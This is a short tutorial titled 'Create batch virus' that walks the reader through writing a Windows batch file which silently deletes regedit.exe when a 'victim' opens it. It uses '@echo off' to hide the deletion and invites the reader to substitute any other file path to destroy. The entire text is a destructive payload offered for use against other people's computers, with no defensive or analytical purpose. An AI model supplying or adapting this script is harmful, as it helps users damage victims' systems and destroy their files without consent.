Create batch virus
In this, I will tell you something about making a simple virus using .bat file. Follow the steps :
1. Open Notepad
2. Write this at the 1st line –
@echo off
3. Write this at the 2nd line –
rem deleting regedit.exe
4. Write this at the 3rd line –
del C:\WINDOWS\regedit.exe
5. Save it as a batch file (.bat)
6. The regedit.exe will be deleted if the victim opens up the .bat file.
7. @echo off is used to hide the deleting process
8. You can replace the ‘del C:\WINDOWS\regedit.exe’ with the address you want to delete.
